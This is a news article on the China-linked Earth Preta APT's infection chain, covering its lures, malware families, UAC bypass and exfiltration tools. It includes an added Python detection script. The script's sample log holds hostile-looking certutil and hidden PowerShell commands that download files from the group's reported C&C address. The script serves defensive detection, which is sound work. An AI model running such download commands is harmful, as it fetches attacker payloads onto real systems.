
Technical analysis of China-linked Earth Preta APT’s infection chain

China-linked Earth Preta cyberespionage group has been observed adopting new techniques to bypass security solutions.

Trend Micro researchers reported that the China-linked Earth Preta group (aka Mustang Panda) is actively changing its tools, tactics, and procedures (TTPs) to bypass security solutions.

Earth Preta, also known as “RedDelta” or “Bronze President,” has been active since at least 2012. It has targeted American and European entities such as government organizations, think tanks, NGOs, and even Catholic organizations at the Vatican. Past campaigns focused on Asian countries, including Taiwan, Hong Kong, Mongolia, Tibet, and Myanmar.

In recent campaigns, the threat actors used European Union reports on the conflict in Ukraine and Ukrainian government reports as lures. Upon opening the reports, the infection process starts, leading to the deployment of malware on the victim’s system.

In a recent campaign analyzed by Trend Micro, the threat actors used spear-phishing emails and Google Drive links as attack vectors.

A deep investigation into the campaign revealed several undisclosed malware and interesting data exfiltration tools used by the group.

The researchers categorized the infection chain into six stages: arrival vectors, discovery, privilege escalation, lateral movement, command and control (C&C), and exfiltration.

The full infection chain (Trend Micro)

The attackers used DLL sideloading, shortcut links, and fake file extensions in the first part of the attacks. The researchers noticed that, starting in October and November 2022, the group began changing its TTPs to deploy the TONEINS, TONESHELL, and PUBLOAD malware.

The TONEINS and TONESHELL malware were downloaded from a Google Drive link embedded in the body of spear-phishing messages. To bypass email-scanning services, the threat actors later started embedding the Google Drive link in a lure document instead. The link points to a password-protected archive, and the document also includes the password needed to open it.

“Based on our observations, Earth Preta tends to hide malicious payloads in fake files, disguising them as legitimate ones — a technique that has been proven effective for avoiding detection. As for privilege escalation, the threat actors tend to reuse codes copied from open-source repositories,” states the report published by Trend Micro. “Meanwhile, they developed customized toolsets designed to collect confidential documents in the exfiltration stage.”

Once they have gained a foothold in the target network, the attackers start the discovery and privilege escalation phases. In the privilege escalation phase, the threat actors used several tools for UAC bypass on Windows 10, such as ABPASS and CCPASS.

During the lateral movement phase, Earth Preta used malware such as HIUPAN and ACNSHELL, which install themselves on removable disks and create a reverse shell.

The group used several tools and commands in the C&C stage, such as certutil.exe to download the legitimate WinRAR binary and PowerShell to download multiple malicious archives from a remote server (103[.]159[.]132[.]181).
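The techniques summarized above (fake file extensions on lure files, certutil.exe abused as a downloader, and PowerShell pulling archives from the reported C&C address) are all visible in process-creation telemetry. The following is an added detection example written for this article; it is not code from Trend Micro or from the Security Affairs post. The only indicator taken from the article is the address 103.159.132.181; the log lines, file names, URL paths and timestamps are constructed, and the field names (ParentImage, Image, CommandLine) follow Sysmon event 1 naming only for readability, not because the lines are real telemetry.

```python
"""
Added example (not from the Security Affairs article or the Trend Micro
report): simple detection rules over constructed process-creation events
that mirror three techniques the article attributes to Earth Preta:
  1. fake file extensions on lure files (e.g. "report.pdf.exe"),
  2. certutil.exe used as a downloader,
  3. PowerShell fetching archives from the C&C address 103.159.132.181.
"""
import re
from typing import Dict, List, Tuple

# Indicator taken from the article; everything else below is constructed.
EARTH_PRETA_C2 = "103.159.132.181"

# Constructed sample telemetry: one pipe-delimited event per line.
SAMPLE_LOG = """\
ts=2022-11-03T09:12:01Z|ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Users\\u\\Downloads\\EU_report.pdf.exe|CommandLine="EU_report.pdf.exe"
ts=2022-11-03T09:12:05Z|ParentImage=C:\\Users\\u\\Downloads\\EU_report.pdf.exe|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil.exe -urlcache -split -f http://103.159.132.181/WinRAR.exe C:\\Users\\Public\\WinRAR.exe
ts=2022-11-03T09:12:09Z|ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://103.159.132.181/a.rar','C:\\Users\\Public\\a.rar')"
ts=2022-11-03T09:15:30Z|ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|CommandLine="WINWORD.EXE" C:\\Users\\u\\Documents\\notes.docx
ts=2022-11-03T09:16:00Z|ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil.exe -hashfile C:\\Users\\Public\\installer.msi SHA256
"""

# A document-looking name immediately followed by an executable extension.
FAKE_EXT_RE = re.compile(
    r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.(exe|scr|com|pif|lnk)$", re.I)
# certutil's URL cache switch is the usual sign of download abuse.
CERTUTIL_DL_RE = re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I)
# Common PowerShell download primitives.
PS_DOWNLOAD_RE = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b)", re.I)


def parse_line(line: str) -> Dict[str, str]:
    """Parse one constructed 'key=value|key=value' event into a dict.
    Only the first '=' in each field separates key from value, so command
    lines containing '=' survive; the layout assumes no '|' inside values."""
    fields: Dict[str, str] = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the list of rule names that fire for a single event."""
    findings: List[str] = []
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    name = image.rsplit("\\", 1)[-1]          # executable file name only
    if FAKE_EXT_RE.search(name):
        findings.append("fake-file-extension")
    if name.lower() == "certutil.exe" and CERTUTIL_DL_RE.search(cmd):
        findings.append("certutil-download")
    if name.lower() == "powershell.exe" and PS_DOWNLOAD_RE.search(cmd):
        findings.append("powershell-download")
    if EARTH_PRETA_C2 in cmd:
        findings.append("known-c2-address")
    return findings


def scan(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """Run every rule over every event; return (timestamp, image, findings)
    for events that triggered at least one rule."""
    results = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        findings = evaluate(event)
        if findings:
            results.append((event["ts"],
                            event["Image"].rsplit("\\", 1)[-1], findings))
    return results


if __name__ == "__main__":
    for ts, image, findings in scan(SAMPLE_LOG):
        print(f"{ts} {image}: {', '.join(findings)}")
```

Run against the constructed log, the scan flags the double-extension lure, the certutil download and the PowerShell download, while the ordinary WINWORD.EXE launch and the benign certutil -hashfile invocation produce no findings. The rules key on the executable name plus its command-line switches rather than on file hashes, so they survive a re-packed payload; the C&C address check is the only indicator-specific rule and is the first thing an operator would need to refresh.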

The group also used the CLEXEC backdoor, the COOLCLIENT and TROCLIENT implants, and the PlugX malware.

The report details the execution flow for each of the above malware.

The threat actors also used highly customized tools for exfiltration, such as NUPAKAGE and ZPAKAGE, both used to steal Office documents.

“Earth Preta is a capable and organized threat actor that is continuously honing its TTPs, strengthening its development capabilities, and building a versatile arsenal of tools and malware,” concludes the report.


Pierluigi Paganini
